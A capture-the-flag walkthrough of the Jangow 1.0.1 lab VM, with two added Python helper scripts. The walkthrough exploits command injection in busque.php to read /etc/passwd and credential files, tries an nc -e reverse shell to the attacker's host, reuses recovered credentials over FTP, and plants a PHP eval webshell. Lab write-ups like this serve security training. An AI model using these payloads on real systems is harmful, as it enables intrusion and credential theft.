Jangow
Author: jason_huawen
Target machine information
Name: Jangow: 1.0.1
Address:
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:c5:cf:d9 1 60 PCS Systemtechnik GmbH
192.168.56.118 08:00:27:5e:21:88 1 60 PCS Systemtechnik GmbH
Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.118.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.118 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 20:56 EST
Nmap scan report for 192.168.56.118
Host is up (0.00032s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
|_http-title: Index of /
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
MAC Address: 08:00:27:5E:21:88 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.0.1; OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.06 seconds
The Nmap results show two open ports on the target: 21 (FTP, vsftpd 3.0.3) and 80 (HTTP, Apache 2.4.18 with directory indexing enabled on /). The remaining 65533 ports are filtered (no response), which points to a host firewall.
Getting a shell
FTP
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit vsFTPd 3.0.3
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
- Anonymous login is not allowed.
- searchsploit returns only a denial-of-service entry for vsftpd 3.0.3, so the FTP version itself offers no way in.
HTTP
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ nikto -h http://192.168.56.118
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.118
+ Target Hostname: 192.168.56.118
+ Target Port: 80
+ Start Time: 2022-12-31 21:02:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /./: Directory indexing found.
+ /./: Appending '/./' to a directory allows indexing
+ OSVDB-3268: //: Directory indexing found.
+ //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /%2e/: Directory indexing found.
+ OSVDB-576: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: ///: Directory indexing found.
+ OSVDB-119: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-119: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when /'s are requested.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time: 2022-12-31 21:02:53 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ nikto -h http://192.168.56.118/site/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.118
+ Target Hostname: 192.168.56.118
+ Target Port: 80
+ Start Time: 2022-12-31 21:03:18 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /site/, inode: 27ce, size: 5c46fbf4bb499, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /site/css/: Directory indexing found.
+ OSVDB-3092: /site/css/: This might be interesting...
+ 7916 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2022-12-31 21:04:04 (GMT-5) (46 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto found nothing exploitable: only directory indexing, missing security headers and an outdated Apache version.
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ dirb http://192.168.56.118
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Dec 31 21:05:07 2022
URL_BASE: http://192.168.56.118/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
---- Entering directory: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
---- Entering directory: http://192.168.56.118/site/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.118/site/wordpress/ ----
+ http://192.168.56.118/site/wordpress/index.html (CODE:200|SIZE:10190)
-----------------
END_TIME: Sat Dec 31 21:05:10 2022
DOWNLOADED: 13836 - FOUND: 3
A wordpress directory was found under /site/.
Opening /site/wordpress/ in the browser does not return anything that looks like a typical WordPress site, but wpscan can confirm that:
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ wpscan --url http://192.168.56.118/site/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
Scan Aborted: The remote website is up, but does not seem to be running WordPress.
wpscan confirms that the target is not running WordPress; it is just an ordinary directory with that name.
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/31 21:09:03 Starting gobuster in directory enumeration mode
===============================================================
/site (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/server-status (Status: 403) [Size: 279]
Progress: 216119 / 220561 (97.99%)===============================================================
2022/12/31 21:09:24 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,js,sh,txt
[+] Timeout: 10s
===============================================================
2022/12/31 21:09:37 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/site (Status: 301) [Size: 315] [--> http://192.168.56.118/site/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1322084 / 1323366 (99.90%)===============================================================
2022/12/31 21:11:49 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ gobuster dir -u http://192.168.56.118/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.118/site/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: js,sh,txt,php,html
[+] Timeout: 10s
===============================================================
2022/12/31 21:12:21 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10190]
/assets (Status: 301) [Size: 322] [--> http://192.168.56.118/site/assets/]
/css (Status: 301) [Size: 319] [--> http://192.168.56.118/site/css/]
/wordpress (Status: 301) [Size: 325] [--> http://192.168.56.118/site/wordpress/]
/js (Status: 301) [Size: 318] [--> http://192.168.56.118/site/js/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1319465 / 1323366 (99.71%)===============================================================
2022/12/31 21:14:39 Finished
===============================================================
Gobuster did not find any directories or files of value either.
However, the home page contains a link that returns a blank page when opened:
http://192.168.56.118/site/busque.php?buscar=
Could the buscar parameter be vulnerable to local file inclusion?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=../../../../../../etc/passwd
Nothing comes back. Could the parameter be passed to a shell instead (command execution)?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The id output confirms that buscar is executed as a shell command under www-data. Check whether nc is available, then try a reverse shell from the browser:
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=which%20nc
/bin/nc
http://192.168.56.118/site/busque.php?buscar=nc%20-e%20/bin/bash%20192.168.56.206%205555
No reverse shell came back.
Various other shell commands also failed to run, so for now we use the commands that do work to gather more information about the host:
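Rather than guessing payloads one by one, the following script (an added example, not part of the original write-up) sends a set of marker probes through the buscar parameter and reports which shell constructs and binaries make it through. The injection URL is taken from the write-up; the probe set, the random marker and the local emulator used for offline testing are this example's own assumptions.

```python
"""Fingerprint what survives a GET-parameter command injection point.

Added example, not from the original write-up. It assumes the target behaves
like busque.php?buscar=<cmd> on this box: the raw parameter reaches a shell
and stdout is echoed back. The transport is a parameter so the same probe
runs against the live target (urllib) or an offline stand-in.
"""
import secrets
import subprocess
from urllib.parse import parse_qs, quote, urlparse
from urllib.request import urlopen

TARGET = "http://192.168.56.118/site/busque.php"  # injection point from the write-up


def http_get(url, timeout=5.0):
    """Live transport: fetch the URL and return the body as text."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def run(cmd, base=TARGET, transport=http_get):
    """Send one shell command through the buscar parameter, fully URL-encoded
    (safe='' so ; | $ > and spaces are never left bare in the query string)."""
    return transport(f"{base}?buscar={quote(cmd, safe='')}")


def fingerprint(base=TARGET, transport=http_get):
    """Return {probe name: True if the marker came back}. A False entry means
    that construct or binary is filtered, missing, or blocked on the way out."""
    marker = secrets.token_hex(4)  # random, so a cached or static page cannot fake a hit
    probes = {
        "plain echo": f"echo {marker}",
        "semicolon": f"true;echo {marker}",
        "pipe": f"echo {marker}|cat",
        "subshell": f"echo $(echo {marker})",
        "backtick": f"echo `echo {marker}`",
        "redirect": f"echo x >/dev/null && echo {marker}",
        "nc present": f"which nc >/dev/null && echo {marker}",
        "python3 present": f"which python3 >/dev/null && echo {marker}",
    }
    return {name: marker in run(cmd, base, transport) for name, cmd in probes.items()}


def make_local_emulator(blocked=("nc", "python")):
    """Offline stand-in for the target (assumption for testing only): decodes
    buscar=, returns nothing when a blocked word appears, which is a crude
    blocklist like the one the write-up's failures suggest, and otherwise runs
    the command in the LOCAL /bin/sh. Only feed it probes you would run on
    your own machine."""
    def transport(url):
        cmd = parse_qs(urlparse(url).query).get("buscar", [""])[0]
        if any(word in cmd for word in blocked):
            return ""
        done = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5)
        return done.stdout
    return transport


if __name__ == "__main__":
    for name, ok in fingerprint().items():
        print(f"{name:16} {'ok' if ok else 'FILTERED/absent'}")
```

A False for a construct tells you what the filter or the outbound firewall is eating before time is spent on payloads that depend on it; on this box the interesting columns are the pipe, the redirect and the nc/python3 checks.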
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
This reveals one regular user account: jangow01 (uid 1000, login shell /bin/bash).
Check whether that user has an SSH private key:
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20/home/jangow01/.ssh/id_rsa
No private key file was found (and port 22 is filtered anyway).
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls%20-alh%20/var/www/html/
total 16K
drwxr-xr-x 3 root root 4.0K Oct 31 2021 .
drwxr-xr-x 3 root root 4.0K Oct 31 2021 ..
-rw-r--r-- 1 www-data www-data 336 Oct 31 2021 .backup
drwxr-xr-x 6 www-data www-data 4.0K Jun 10 2021 site
Listing /var/www/html with ls -alh reveals a hidden .backup file. Can we read it?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ curl http://192.168.56.118/site/busque.php?buscar=cat%20%20/var/www/html/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
.backup holds MySQL connection settings in PHP: database jangow01, user jangow01, password abygurl69. The target does not expose SSH, so try the same username and password against FTP instead (password reuse across services is common):
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51742|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 14 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp>
The FTP login lands in /var/www, the parent of the web root (html). Can shell.php be uploaded into the site tree?
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51742|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 .
drwxr-xr-x 14 0 0 4096 Jun 10 2021 ..
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||25840|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> cd html
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||58150|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> cd site
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||35486|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||64287|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||8893|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||37557|)
553 Could not create file.
ftp> ls
229 Entering Extended Passive Mode (|||20630|)
150 Here comes the directory listing.
drwxr-xr-x 6 33 33 4096 Jun 10 2021 site
226 Directory send OK.
ftp> cd site
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||23339|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd assets
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19504|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 23462 Jun 03 2021 favicon.ico
drwxr-xr-x 2 33 33 4096 Jun 03 2021 img
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||51542|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||5801|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd wordpress
250 Directory successfully changed.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||52179|)
553 Could not create file.
ftp> cd js
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||35443|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 347 Jun 10 2021 config.php
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
226 Directory send OK.
ftp> get config.php
local: config.php remote: config.php
229 Entering Extended Passive Mode (|||22735|)
150 Opening BINARY mode data connection for config.php (347 bytes).
100% |*********************************************************************************| 347 0.69 KiB/s 00:00 ETA
226 Transfer complete.
347 bytes received in 00:00 (0.69 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||41140|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd wordpress
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||28848|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 347 Jun 10 2021 config.php
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||26559|)
150 Here comes the directory listing.
drwxr-xr-x 3 33 33 4096 Jun 03 2021 assets
-rw-r--r-- 1 33 33 35 Jun 10 2021 busque.php
drwxr-xr-x 2 33 33 4096 Jun 03 2021 css
-rw-r--r-- 1 33 33 10190 Jun 10 2021 index.html
drwxr-xr-x 2 33 33 4096 Jun 03 2021 js
drwxr-xr-x 2 33 33 4096 Jun 10 2021 wordpress
226 Directory send OK.
ftp> cd css
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||20319|)
150 Here comes the directory listing.
-rw-r--r-- 1 33 33 207746 Jun 03 2021 styles.css
226 Directory send OK.
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||59898|)
553 Could not create file.
ftp> cd ..
250 Directory successfully changed.
ftp>
None of the put attempts succeed (553 Could not create file): the directories under /var/www/html are owned by root or by www-data (uid 33) with mode 755, so the jangow01 FTP account has no write access anywhere in the web root.
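The manual put-in-every-directory loop above can be automated. The following script (an added example, not from the original write-up) walks the tree over FTP and reports which directories accept a zero-byte upload, cleaning up after itself. It assumes a vsftpd-style server that answers 553 to a denied STOR and 550 to a failed CWD, and the jangow01 credentials recovered from .backup; the FTP object is a parameter, and the in-memory stand-in and sample tree (built from the listings above) exist so the walk can be exercised offline.

```python
"""Map which directories an FTP account can write to, instead of trying put
by hand in each one. Added example, not from the original write-up. It assumes
a vsftpd-style server (553 on a denied STOR, 550 on a failed CWD) and the
jangow01 credentials recovered from .backup. The FTP object is a parameter
so the walk can run against an in-memory stand-in offline.
"""
import posixpath
from ftplib import FTP, error_perm
from io import BytesIO


def _can_write(ftp, path, probe):
    """Try a zero-byte STOR into path; remove it again on success."""
    target = posixpath.join(path, probe)
    try:
        ftp.storbinary(f"STOR {target}", BytesIO(b""))
    except error_perm:            # 553 Could not create file.
        return False
    try:
        ftp.delete(target)
    except error_perm:
        pass                      # upload worked but cleanup was denied: remove it later by hand
    return True


def walk_writable(ftp, start="/", max_depth=4, probe=".wtest"):
    """Depth-first walk from start using absolute paths; returns the sorted
    list of directories the logged-in account can create files in."""
    writable, stack, seen = [], [(start, 0)], set()
    while stack:
        path, depth = stack.pop()
        if path in seen:
            continue
        seen.add(path)
        try:
            ftp.cwd(path)
        except error_perm:        # a plain file, or a directory we may not enter
            continue
        if _can_write(ftp, path, probe):
            writable.append(path)
        if depth < max_depth:
            try:
                names = ftp.nlst()
            except error_perm:    # some servers answer 550 for an empty directory
                names = []
            for name in names:
                stack.append((posixpath.join(path, name), depth + 1))
    return sorted(writable)


class FakeFTP:
    """In-memory stand-in for ftplib.FTP with just the calls walk_writable uses
    (assumption for offline testing). dirs maps absolute directory path ->
    entry names; writable is the set of directories that accept STOR."""
    def __init__(self, dirs, writable):
        self.dirs, self.writable, self.cwd_, self.stored = dirs, set(writable), "/", []

    def cwd(self, path):
        full = posixpath.normpath(posixpath.join(self.cwd_, path))
        if full not in self.dirs:
            raise error_perm("550 Failed to change directory.")
        self.cwd_ = full

    def nlst(self):
        return list(self.dirs[self.cwd_])

    def storbinary(self, cmd, fp):
        target = cmd.split(" ", 1)[1]
        if posixpath.dirname(target) not in self.writable:
            raise error_perm("553 Could not create file.")
        self.stored.append(target)

    def delete(self, target):
        self.stored.remove(target)


# Constructed from the listings in the write-up: web root owned by root/www-data
# (read-only for jangow01), home directory owned by jangow01 (writable).
SAMPLE_TREE = {
    "/var/www": ["html"],
    "/var/www/html": [".backup", "site"],
    "/var/www/html/site": ["assets", "busque.php", "css", "index.html", "js", "wordpress"],
    "/var/www/html/site/assets": ["favicon.ico", "img"],
    "/var/www/html/site/assets/img": [],
    "/var/www/html/site/css": ["styles.css"],
    "/var/www/html/site/js": [],
    "/var/www/html/site/wordpress": ["config.php", "index.html"],
    "/home": ["jangow01"],
    "/home/jangow01": [".nano", "user.txt"],
    "/home/jangow01/.nano": [],
}
SAMPLE_WRITABLE = {"/home/jangow01", "/home/jangow01/.nano"}


if __name__ == "__main__":
    ftp = FTP("192.168.56.118", timeout=10)
    ftp.login("jangow01", "abygurl69")   # credentials from /var/www/html/.backup
    for root in ("/var/www", "/home"):
        print(root, walk_writable(ftp, root))
    ftp.quit()
```

Against the live box the walk under /var/www comes back empty and the walk under /home reports the jangow01 home directory, which is exactly where 45010.c is uploaded later in this write-up.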
The key now is to get a shell. Since nc and Python payloads do not run through the injection point, use echo via the command injection to write a shell.php (the injected commands run as www-data, which owns /var/www/html/site and can therefore write there), then request that file.
192.168.56.118/site/busque.php?buscar=echo '' > jason.php
Verify that the file was created:
┌──(kali㉿kali)-[~/Vulnhub/jangow]
└─$ curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
jason.php
js
shell.php
wordpress
192.168.56.118/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]); ?>' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo '' > shell.php
http://192.168.56.118/site/busque.php?buscar=echo%20%27%3C?php%20eval($_POST[%22cmd%22]);%20?%3E%27%20%3E%20shell.php
After much trial and error, the Linux version of AntSword (蚁剑) was used to connect to this shell.php.
That gives a webshell, but a proper reverse shell is still wanted; a plain nc -e attempt fails with an error because the target's nc build does not support the -e option, so the mkfifo form is used instead:
